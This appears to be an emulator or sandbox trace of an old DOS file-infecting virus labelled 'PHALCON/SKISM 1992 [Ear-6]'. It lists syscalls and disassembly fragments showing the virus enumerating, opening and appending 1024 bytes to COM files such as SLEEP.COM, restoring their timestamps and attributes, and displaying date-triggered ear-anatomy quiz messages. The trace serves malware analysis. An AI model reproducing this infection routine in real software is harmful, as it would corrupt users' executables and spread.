2018-12-25T11:46:13.985032346Z 67 PC: 12cf7 | Get or set file attributes (See above)
2018-12-25T11:46:13.995696781Z 79 PC: 12b9e | Find next file (See above)
2018-12-25T11:46:13.998429823Z 61 PC: 12d18 | Open file (See above)
2018-12-25T11:46:14.005985929Z 63 PC: 12bb0 | Read file or device (See above)
2018-12-25T11:46:14.013006042Z 62 PC: 12bb4 | Close file (See above)
2018-12-25T11:46:14.01502015Z 61 PC: 12d18 | Open file (See above)
2018-12-25T11:46:14.02216223Z 64 PC: 12c87 | Write file or device (See above)
2018-12-25T11:46:14.025138419Z 66 PC: 12c90 | Move file pointer (See above)
2018-12-25T11:46:14.026538179Z 44 PC: 12c94 | Get time (See above)
2018-12-25T11:46:14.029502091Z 64 PC: 12ef3 | Write file or device (See above)
2018-12-25T11:46:14.039979697Z 87 PC: 12ce4 | Get or set file date and time (See above)
2018-12-25T11:46:14.042709763Z 62 PC: 12ce8 | Close file (See above)
2018-12-25T11:46:14.051179405Z 67 PC: 12cf7 | Get or set file attributes (See above)
2018-12-25T11:46:14.062409071Z 79 PC: 12b9e | Find next file (See above)
2018-12-25T11:46:14.065262459Z 61 PC: 12d18 | Open file (See above)
2018-12-25T11:46:14.073648707Z 63 PC: 12bb0 | Read file or device (See above)
2018-12-25T11:46:14.08157061Z 62 PC: 12bb4 | Close file (See above)
2018-12-25T11:46:14.08372098Z 61 PC: 12d18 | Open file (See above)
2018-12-25T11:46:14.091098678Z 64 PC: 12c87 | Write file or device (See above)
2018-12-25T11:46:14.095437948Z 66 PC: 12c90 | Move file pointer (See above)
2018-12-25T11:46:14.097451042Z 44 PC: 12c94 | Get time (See above)
2018-12-25T11:46:14.100757224Z 64 PC: 12ef3 | Write file or device (See above)
2018-12-25T11:46:14.112447704Z 87 PC: 12ce4 | Get or set file date and time (See above)
2018-12-25T11:46:14.114355932Z 62 PC: 12ce8 | Close file (See above)
2018-12-25T11:46:14.1233828Z 67 PC: 12cf7 | Get or set file attributes (See above)
2018-12-25T11:46:14.135453457Z 79 PC: 12b9e | Find next file (See above)
2018-12-25T11:46:14.140078341Z 61 PC: 12d18 | Open file (See above)
2018-12-25T11:46:14.147280147Z 63 PC: 12bb0 | Read file or device (See above)
2018-12-25T11:46:14.154471277Z 62 PC: 12bb4 | Close file (See above)
2018-12-25T11:46:14.157186446Z 79 PC: 12b9e | Find next file (See above)
2018-12-25T11:46:14.159790206Z 59 PC: 12af7 | Change current directory
2018-12-25T11:46:14.164272087Z 59 PC: 12b01 | Change current directory
2018-12-25T11:46:14.175451892Z 42 PC: 12b05 | Get date 0x12b05: cmp dl, 1
0x12b08: jne 0x12b5c
0x12b0a: mov ah, 0x2c
0x12b0c: int 0x21
0x12b0e: cmp dl, 0x55
0x12b11: jg 0x12b5c
0x12b13: and dx, 7
0x12b16: shl dl, 1
0x12b18: mov bx, bp
0x12b1a: add bx, dx
0x12b1c: mov dx, word ptr [bx + 0x3b4]
0x12b20: add dx, bp
0x12b22: inc dx
0x12b23: push dx
0x12b24: mov ah, 9
0x12b26: lea dx, word ptr [bp + 0x40c]
0x12b2a: int 0x21
0x12b2c: pop dx
0x12b2d: int 0x21
0x12b2f: dec dx
2018-12-25T11:46:14.178009688Z 44 PC: 12b0e | Get time 0x12b0e: cmp dl, 0x55
0x12b11: jg 0x12b5c
0x12b13: and dx, 7
0x12b16: shl dl, 1
0x12b18: mov bx, bp
0x12b1a: add bx, dx
0x12b1c: mov dx, word ptr [bx + 0x3b4]
0x12b20: add dx, bp
0x12b22: inc dx
0x12b23: push dx
0x12b24: mov ah, 9
0x12b26: lea dx, word ptr [bp + 0x40c]
0x12b2a: int 0x21
0x12b2c: pop dx
0x12b2d: int 0x21
0x12b2f: dec dx
0x12b30: push dx
0x12b31: lea dx, word ptr [bp + 0x43d]
0x12b35: int 0x21
0x12b37: mov ah, 7
2018-12-25T11:46:14.180613647Z 9 PC: 12b2c | Display string (String= 'PHALCON/SKISM 1992 [Ear-6] Alert! Where is the ')
2018-12-25T11:46:14.187841835Z 9 PC: 12b2f | Display string (String= 'Auditory Canal')
2018-12-25T11:46:14.190233328Z 9 PC: 12b37 | Display string (String= ' located? 1. External Ear 2. Middle Ear 3. Inner Ear ( )')
2018-12-25T11:46:14.200397948Z 7 PC: 12b3b | Direct console input without echo

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":2681,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:46:14.321651727Z 26 PC: 12ac8 | Set disk transfer address
2018-12-25T11:46:14.323029185Z 71 PC: 12ada | Get current directory
2018-12-25T11:46:14.326309226Z 78 PC: 12b9e | Find first file
2018-12-25T11:46:14.332580936Z 78 PC: 12b9e | Find first file (See above)
2018-12-25T11:46:14.344931512Z 61 PC: 12d18 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:46:14.352308579Z 63 PC: 12bb0 | Read file or device (Read 26 bytes on handle 5)
2018-12-25T11:46:14.360073119Z 62 PC: 12bb4 | Close file
2018-12-25T11:46:14.362519062Z 61 PC: 12d18 | Open file (See above)
2018-12-25T11:46:14.37064516Z 64 PC: 12c87 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:46:14.373788856Z 66 PC: 12c90 | Move file pointer
2018-12-25T11:46:14.375684227Z 44 PC: 12c94 | Get time 0x12c94: mov word ptr [bp + 0x10c], cx
0x12c98: and cx, 0x1f
0x12c9b: add cx, 0x200
0x12c9f: mov word ptr [bp + 0x107], cx
0x12ca3: lea di, word ptr [bp + 0x570]
0x12ca7: mov al, 0x53
0x12ca9: stosb byte ptr es:[di], al
0x12caa: lea si, word ptr [bp + 0x103]
0x12cae: push si
0x12caf: mov cx, 0x10
0x12cb2: push cx
0x12cb3: rep movsb byte ptr es:[di], byte ptr [si]
0x12cb5: mov al, 0x5b
0x12cb7: stosb byte ptr es:[di], al
0x12cb8: lea si, word ptr [bp + 0x4f7]
0x12cbc: mov cx, 0xb
0x12cbf: rep movsb byte ptr es:[di], byte ptr [si]
0x12cc1: mov al, 0x53
0x12cc3: stosb byte ptr es:[di], al
0x12cc4: pop cx
2018-12-25T11:46:14.37948137Z 64 PC: 12ef3 | Write file or device (Write 1024 bytes on handle 5)
2018-12-25T11:46:14.396088904Z 87 PC: 12ce4 | Get or set file date and time
2018-12-25T11:46:14.397766899Z 62 PC: 12ce8 | Close file
2018-12-25T11:46:14.41384111Z 67 PC: 12cf7 | Get or set file attributes
2018-12-25T11:46:14.425581517Z 79 PC: 12b9e | Find next file (See above)
2018-12-25T11:46:14.428929357Z 61 PC: 12d18 | Open file (See above)
2018-12-25T11:46:14.436704225Z 63 PC: 12bb0 | Read file or device (See above)
2018-12-25T11:46:14.444408381Z 62 PC: 12bb4 | Close file (See above)
2018-12-25T11:46:14.446612098Z 61 PC: 12d18 | Open file (See above)
2018-12-25T11:46:14.45430177Z 64 PC: 12c87 | Write file or device (See above)
2018-12-25T11:46:14.458268889Z 66 PC: 12c90 | Move file pointer (See above)
2018-12-25T11:46:14.459491563Z 44 PC: 12c94 | Get time (See above)
2018-12-25T11:46:14.461492785Z 64 PC: 12ef3 | Write file or device (See above)
2018-12-25T11:46:14.468643056Z 87 PC: 12ce4 | Get or set file date and time (See above)
2018-12-25T11:46:14.470565482Z 62 PC: 12ce8 | Close file (See above)
2018-12-25T11:46:14.479193687Z 67 PC: 12cf7 | Get or set file attributes (See above)
2018-12-25T11:46:14.487588521Z 79 PC: 12b9e | Find next file (See above)
2018-12-25T11:46:14.489564815Z 61 PC: 12d18 | Open file (See above)
2018-12-25T11:46:14.494402211Z 63 PC: 12bb0 | Read file or device (See above)
2018-12-25T11:46:14.499277919Z 62 PC: 12bb4 | Close file (See above)
2018-12-25T11:46:14.501356244Z 61 PC: 12d18 | Open file (See above)
2018-12-25T11:46:14.508595372Z 64 PC: 12c87 | Write file or device (See above)
2018-12-25T11:46:14.512185237Z 66 PC: 12c90 | Move file pointer (See above)
2018-12-25T11:46:14.514017761Z 44 PC: 12c94 | Get time (See above)
2018-12-25T11:46:14.517154501Z 64 PC: 12ef3 | Write file or device (See above)
2018-12-25T11:46:14.528357658Z 87 PC: 12ce4 | Get or set file date and time (See above)
2018-12-25T11:46:14.530261575Z 62 PC: 12ce8 | Close file (See above)
2018-12-25T11:46:14.537426531Z 67 PC: 12cf7 | Get or set file attributes (See above)
2018-12-25T11:46:14.548998013Z 79 PC: 12b9e | Find next file (See above)
2018-12-25T11:46:14.554029398Z 61 PC: 12d18 | Open file (See above)
2018-12-25T11:46:14.562390013Z 63 PC: 12bb0 | Read file or device (See above)
2018-12-25T11:46:14.569627597Z 62 PC: 12bb4 | Close file (See above)
2018-12-25T11:46:14.572643077Z 61 PC: 12d18 | Open file (See above)
2018-12-25T11:46:14.580834457Z 64 PC: 12c87 | Write file or device (See above)
2018-12-25T11:46:14.584120245Z 66 PC: 12c90 | Move file pointer (See above)
2018-12-25T11:46:14.586897133Z 44 PC: 12c94 | Get time (See above)
2018-12-25T11:46:14.590102573Z 64 PC: 12ef3 | Write file or device (See above)
2018-12-25T11:46:14.599842404Z 87 PC: 12ce4 | Get or set file date and time (See above)
2018-12-25T11:46:14.602324714Z 62 PC: 12ce8 | Close file (See above)
2018-12-25T11:46:14.610964881Z 67 PC: 12cf7 | Get or set file attributes (See above)
2018-12-25T11:46:14.622336008Z 79 PC: 12b9e | Find next file (See above)
2018-12-25T11:46:14.625936177Z 61 PC: 12d18 | Open file (See above)
2018-12-25T11:46:14.633181458Z 63 PC: 12bb0 | Read file or device (See above)
2018-12-25T11:46:14.640208172Z 62 PC: 12bb4 | Close file (See above)
2018-12-25T11:46:14.643066787Z 61 PC: 12d18 | Open file (See above)
2018-12-25T11:46:14.650493521Z 64 PC: 12c87 | Write file or device (See above)
2018-12-25T11:46:14.653812235Z 66 PC: 12c90 | Move file pointer (See above)
2018-12-25T11:46:14.655876369Z 44 PC: 12c94 | Get time (See above)
2018-12-25T11:46:14.659368711Z 64 PC: 12ef3 | Write file or device (See above)
2018-12-25T11:46:14.669907949Z 87 PC: 12ce4 | Get or set file date and time (See above)
2018-12-25T11:46:14.671906317Z 62 PC: 12ce8 | Close file (See above)
2018-12-25T11:46:14.682137772Z 67 PC: 12cf7 | Get or set file attributes (See above)
2018-12-25T11:46:14.697138058Z 79 PC: 12b9e | Find next file (See above)
2018-12-25T11:46:14.70118572Z 61 PC: 12d18 | Open file (See above)
2018-12-25T11:46:14.709050513Z 63 PC: 12bb0 | Read file or device (See above)
2018-12-25T11:46:14.716256244Z 62 PC: 12bb4 | Close file (See above)
2018-12-25T11:46:14.718340682Z 61 PC: 12d18 | Open file (See above)
2018-12-25T11:46:14.727175799Z 64 PC: 12c87 | Write file or device (See above)
2018-12-25T11:46:14.730701089Z 66 PC: 12c90 | Move file pointer (See above)
2018-12-25T11:46:14.732430998Z 44 PC: 12c94 | Get time (See above)
2018-12-25T11:46:14.736315029Z 64 PC: 12ef3 | Write file or device (See above)
2018-12-25T11:46:14.746946729Z 87 PC: 12ce4 | Get or set file date and time (See above)
2018-12-25T11:46:14.748579044Z 62 PC: 12ce8 | Close file (See above)
2018-12-25T11:46:14.757475661Z 67 PC: 12cf7 | Get or set file attributes (See above)
2018-12-25T11:46:14.76907392Z 79 PC: 12b9e | Find next file (See above)
2018-12-25T11:46:14.771768871Z 61 PC: 12d18 | Open file (See above)
2018-12-25T11:46:14.77877497Z 63 PC: 12bb0 | Read file or device (See above)
2018-12-25T11:46:14.78648631Z 62 PC: 12bb4 | Close file (See above)
2018-12-25T11:46:14.788550651Z 61 PC: 12d18 | Open file (See above)
2018-12-25T11:46:14.796198091Z 64 PC: 12c87 | Write file or device (See above)
2018-12-25T11:46:14.800588116Z 66 PC: 12c90 | Move file pointer (See above)
2018-12-25T11:46:14.802215019Z 44 PC: 12c94 | Get time (See above)
2018-12-25T11:46:14.805671587Z 64 PC: 12ef3 | Write file or device (See above)
2018-12-25T11:46:14.816382267Z 87 PC: 12ce4 | Get or set file date and time (See above)
2018-12-25T11:46:14.818346348Z 62 PC: 12ce8 | Close file (See above)
2018-12-25T11:46:14.826988152Z 67 PC: 12cf7 | Get or set file attributes (See above)
2018-12-25T11:46:14.838854082Z 79 PC: 12b9e | Find next file (See above)
2018-12-25T11:46:14.842097042Z 61 PC: 12d18 | Open file (See above)
2018-12-25T11:46:14.849667812Z 63 PC: 12bb0 | Read file or device (See above)
2018-12-25T11:46:14.857337697Z 62 PC: 12bb4 | Close file (See above)
2018-12-25T11:46:14.858729197Z 79 PC: 12b9e | Find next file (See above)
2018-12-25T11:46:14.860481371Z 59 PC: 12af7 | Change current directory
2018-12-25T11:46:14.86379619Z 59 PC: 12b01 | Change current directory
2018-12-25T11:46:14.874063226Z 42 PC: 12b05 | Get date 0x12b05: cmp dl, 1
0x12b08: jne 0x12b5c
0x12b0a: mov ah, 0x2c
0x12b0c: int 0x21
0x12b0e: cmp dl, 0x55
0x12b11: jg 0x12b5c
0x12b13: and dx, 7
0x12b16: shl dl, 1
0x12b18: mov bx, bp
0x12b1a: add bx, dx
0x12b1c: mov dx, word ptr [bx + 0x3b4]
0x12b20: add dx, bp
0x12b22: inc dx
0x12b23: push dx
0x12b24: mov ah, 9
0x12b26: lea dx, word ptr [bp + 0x40c]
0x12b2a: int 0x21
0x12b2c: pop dx
0x12b2d: int 0x21
0x12b2f: dec dx
2018-12-25T11:46:14.876302467Z 44 PC: 12b0e | Get time 0x12b0e: cmp dl, 0x55
0x12b11: jg 0x12b5c
0x12b13: and dx, 7
0x12b16: shl dl, 1
0x12b18: mov bx, bp
0x12b1a: add bx, dx
0x12b1c: mov dx, word ptr [bx + 0x3b4]
0x12b20: add dx, bp
0x12b22: inc dx
0x12b23: push dx
0x12b24: mov ah, 9
0x12b26: lea dx, word ptr [bp + 0x40c]
0x12b2a: int 0x21
0x12b2c: pop dx
0x12b2d: int 0x21
0x12b2f: dec dx
0x12b30: push dx
0x12b31: lea dx, word ptr [bp + 0x43d]
0x12b35: int 0x21
0x12b37: mov ah, 7
2018-12-25T11:46:14.878983309Z 9 PC: 12b2c | Display string (String= 'PHALCON/SKISM 1992 [Ear-6] Alert! Where is the ')
2018-12-25T11:46:14.884970187Z 9 PC: 12b2f | Display string (String= 'Auditory Nerve')
2018-12-25T11:46:14.887320684Z 9 PC: 12b37 | Display string (String= ' located? 1. External Ear 2. Middle Ear 3. Inner Ear ( )')
2018-12-25T11:46:14.912534016Z 7 PC: 12b3b | Direct console input without echo

{"DateBased":true,"Day":2,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":2681,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:46:14.461396016Z 26 PC: 12ac8 | Set disk transfer address
2018-12-25T11:46:14.463067814Z 71 PC: 12ada | Get current directory
2018-12-25T11:46:14.466654449Z 78 PC: 12b9e | Find first file
2018-12-25T11:46:14.470761298Z 78 PC: 12b9e | Find first file (See above)
2018-12-25T11:46:14.474619566Z 61 PC: 12d18 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:46:14.485849942Z 63 PC: 12bb0 | Read file or device (Read 26 bytes on handle 5)
2018-12-25T11:46:14.490692043Z 62 PC: 12bb4 | Close file
2018-12-25T11:46:14.492631111Z 61 PC: 12d18 | Open file (See above)
2018-12-25T11:46:14.500630121Z 64 PC: 12c87 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:46:14.505510121Z 66 PC: 12c90 | Move file pointer
2018-12-25T11:46:14.50680069Z 44 PC: 12c94 | Get time 0x12c94: mov word ptr [bp + 0x10c], cx
0x12c98: and cx, 0x1f
0x12c9b: add cx, 0x200
0x12c9f: mov word ptr [bp + 0x107], cx
0x12ca3: lea di, word ptr [bp + 0x570]
0x12ca7: mov al, 0x53
0x12ca9: stosb byte ptr es:[di], al
0x12caa: lea si, word ptr [bp + 0x103]
0x12cae: push si
0x12caf: mov cx, 0x10
0x12cb2: push cx
0x12cb3: rep movsb byte ptr es:[di], byte ptr [si]
0x12cb5: mov al, 0x5b
0x12cb7: stosb byte ptr es:[di], al
0x12cb8: lea si, word ptr [bp + 0x4f7]
0x12cbc: mov cx, 0xb
0x12cbf: rep movsb byte ptr es:[di], byte ptr [si]
0x12cc1: mov al, 0x53
0x12cc3: stosb byte ptr es:[di], al
0x12cc4: pop cx
2018-12-25T11:46:14.50934819Z 64 PC: 12ef3 | Write file or device (Write 1024 bytes on handle 5)
2018-12-25T11:46:14.521940791Z 87 PC: 12ce4 | Get or set file date and time
2018-12-25T11:46:14.523774366Z 62 PC: 12ce8 | Close file
2018-12-25T11:46:14.538813215Z 67 PC: 12cf7 | Get or set file attributes
2018-12-25T11:46:14.550260744Z 79 PC: 12b9e | Find next file (See above)
2018-12-25T11:46:14.553233917Z 61 PC: 12d18 | Open file (See above)
2018-12-25T11:46:14.56077161Z 63 PC: 12bb0 | Read file or device (See above)
2018-12-25T11:46:14.568057808Z 62 PC: 12bb4 | Close file (See above)
2018-12-25T11:46:14.569983847Z 61 PC: 12d18 | Open file (See above)
2018-12-25T11:46:14.577597999Z 64 PC: 12c87 | Write file or device (See above)
2018-12-25T11:46:14.580810814Z 66 PC: 12c90 | Move file pointer (See above)
2018-12-25T11:46:14.582189941Z 44 PC: 12c94 | Get time (See above)
2018-12-25T11:46:14.585021916Z 64 PC: 12ef3 | Write file or device (See above)
2018-12-25T11:46:14.595633355Z 87 PC: 12ce4 | Get or set file date and time (See above)
2018-12-25T11:46:14.597336325Z 62 PC: 12ce8 | Close file (See above)
2018-12-25T11:46:14.605986537Z 67 PC: 12cf7 | Get or set file attributes (See above)
2018-12-25T11:46:14.618586364Z 79 PC: 12b9e | Find next file (See above)
2018-12-25T11:46:14.621479317Z 61 PC: 12d18 | Open file (See above)
2018-12-25T11:46:14.628568584Z 63 PC: 12bb0 | Read file or device (See above)
2018-12-25T11:46:14.636429897Z 62 PC: 12bb4 | Close file (See above)
2018-12-25T11:46:14.638569854Z 61 PC: 12d18 | Open file (See above)
2018-12-25T11:46:14.645988426Z 64 PC: 12c87 | Write file or device (See above)
2018-12-25T11:46:14.650490891Z 66 PC: 12c90 | Move file pointer (See above)
2018-12-25T11:46:14.653259653Z 44 PC: 12c94 | Get time (See above)
2018-12-25T11:46:14.657772724Z 64 PC: 12ef3 | Write file or device (See above)
2018-12-25T11:46:14.668871902Z 87 PC: 12ce4 | Get or set file date and time (See above)
2018-12-25T11:46:14.672037881Z 62 PC: 12ce8 | Close file (See above)
2018-12-25T11:46:14.681553533Z 67 PC: 12cf7 | Get or set file attributes (See above)
2018-12-25T11:46:14.692959105Z 79 PC: 12b9e | Find next file (See above)
2018-12-25T11:46:14.697621169Z 61 PC: 12d18 | Open file (See above)
2018-12-25T11:46:14.705427176Z 63 PC: 12bb0 | Read file or device (See above)
2018-12-25T11:46:14.713960942Z 62 PC: 12bb4 | Close file (See above)
2018-12-25T11:46:14.719219867Z 61 PC: 12d18 | Open file (See above)
2018-12-25T11:46:14.72658296Z 64 PC: 12c87 | Write file or device (See above)
2018-12-25T11:46:14.730003993Z 66 PC: 12c90 | Move file pointer (See above)
2018-12-25T11:46:14.732167216Z 44 PC: 12c94 | Get time (See above)
2018-12-25T11:46:14.73518034Z 64 PC: 12ef3 | Write file or device (See above)
2018-12-25T11:46:14.744970112Z 87 PC: 12ce4 | Get or set file date and time (See above)
2018-12-25T11:46:14.747431958Z 62 PC: 12ce8 | Close file (See above)
2018-12-25T11:46:14.755952504Z 67 PC: 12cf7 | Get or set file attributes (See above)
2018-12-25T11:46:14.766717305Z 79 PC: 12b9e | Find next file (See above)
2018-12-25T11:46:14.770755709Z 61 PC: 12d18 | Open file (See above)
2018-12-25T11:46:14.777996631Z 63 PC: 12bb0 | Read file or device (See above)
2018-12-25T11:46:14.785549694Z 62 PC: 12bb4 | Close file (See above)
2018-12-25T11:46:14.788399737Z 61 PC: 12d18 | Open file (See above)
2018-12-25T11:46:14.796787799Z 64 PC: 12c87 | Write file or device (See above)
2018-12-25T11:46:14.799921799Z 66 PC: 12c90 | Move file pointer (See above)
2018-12-25T11:46:14.80163389Z 44 PC: 12c94 | Get time (See above)
2018-12-25T11:46:14.806269179Z 64 PC: 12ef3 | Write file or device (See above)
2018-12-25T11:46:14.816153603Z 87 PC: 12ce4 | Get or set file date and time (See above)
2018-12-25T11:46:14.818056267Z 62 PC: 12ce8 | Close file (See above)
2018-12-25T11:46:14.828500006Z 67 PC: 12cf7 | Get or set file attributes (See above)
2018-12-25T11:46:14.839456906Z 79 PC: 12b9e | Find next file (See above)
2018-12-25T11:46:14.842626494Z 61 PC: 12d18 | Open file (See above)
2018-12-25T11:46:14.850487621Z 63 PC: 12bb0 | Read file or device (See above)
2018-12-25T11:46:14.85834934Z 62 PC: 12bb4 | Close file (See above)
2018-12-25T11:46:14.860739793Z 61 PC: 12d18 | Open file (See above)
2018-12-25T11:46:14.869757853Z 64 PC: 12c87 | Write file or device (See above)
2018-12-25T11:46:14.887086674Z 66 PC: 12c90 | Move file pointer (See above)
2018-12-25T11:46:14.888819926Z 44 PC: 12c94 | Get time (See above)
2018-12-25T11:46:14.892394402Z 64 PC: 12ef3 | Write file or device (See above)
2018-12-25T11:46:14.903930329Z 87 PC: 12ce4 | Get or set file date and time (See above)
2018-12-25T11:46:14.906014605Z 62 PC: 12ce8 | Close file (See above)
2018-12-25T11:46:14.930702103Z 67 PC: 12cf7 | Get or set file attributes (See above)
2018-12-25T11:46:14.942413846Z 79 PC: 12b9e | Find next file (See above)
2018-12-25T11:46:14.945432746Z 61 PC: 12d18 | Open file (See above)
2018-12-25T11:46:14.952985951Z 63 PC: 12bb0 | Read file or device (See above)
2018-12-25T11:46:14.960635042Z 62 PC: 12bb4 | Close file (See above)
2018-12-25T11:46:14.962731519Z 61 PC: 12d18 | Open file (See above)
2018-12-25T11:46:14.9700588Z 64 PC: 12c87 | Write file or device (See above)
2018-12-25T11:46:14.973745305Z 66 PC: 12c90 | Move file pointer (See above)
2018-12-25T11:46:14.975205891Z 44 PC: 12c94 | Get time (See above)
2018-12-25T11:46:14.978029244Z 64 PC: 12ef3 | Write file or device (See above)
2018-12-25T11:46:14.995564502Z 87 PC: 12ce4 | Get or set file date and time (See above)
2018-12-25T11:46:14.997263483Z 62 PC: 12ce8 | Close file (See above)
2018-12-25T11:46:15.006055106Z 67 PC: 12cf7 | Get or set file attributes (See above)
2018-12-25T11:46:15.018508225Z 79 PC: 12b9e | Find next file (See above)
2018-12-25T11:46:15.022068704Z 61 PC: 12d18 | Open file (See above)
2018-12-25T11:46:15.030051916Z 63 PC: 12bb0 | Read file or device (See above)
2018-12-25T11:46:15.038323977Z 62 PC: 12bb4 | Close file (See above)
2018-12-25T11:46:15.04054424Z 79 PC: 12b9e | Find next file (See above)
2018-12-25T11:46:15.047582212Z 59 PC: 12af7 | Change current directory
2018-12-25T11:46:15.052771364Z 59 PC: 12b01 | Change current directory
2018-12-25T11:46:15.062642953Z 42 PC: 12b05 | Get date 0x12b05: cmp dl, 1
0x12b08: jne 0x12b5c
0x12b0a: mov ah, 0x2c
0x12b0c: int 0x21
0x12b0e: cmp dl, 0x55
0x12b11: jg 0x12b5c
0x12b13: and dx, 7
0x12b16: shl dl, 1
0x12b18: mov bx, bp
0x12b1a: add bx, dx
0x12b1c: mov dx, word ptr [bx + 0x3b4]
0x12b20: add dx, bp
0x12b22: inc dx
0x12b23: push dx
0x12b24: mov ah, 9
0x12b26: lea dx, word ptr [bp + 0x40c]
0x12b2a: int 0x21
0x12b2c: pop dx
0x12b2d: int 0x21
0x12b2f: dec dx
2018-12-25T11:46:15.065028629Z 26 PC: 12b69 | Set disk transfer address
2018-12-25T11:46:15.066112314Z 9 PC: 12a67 | Display string (String= 'This is a tiny COM program. ')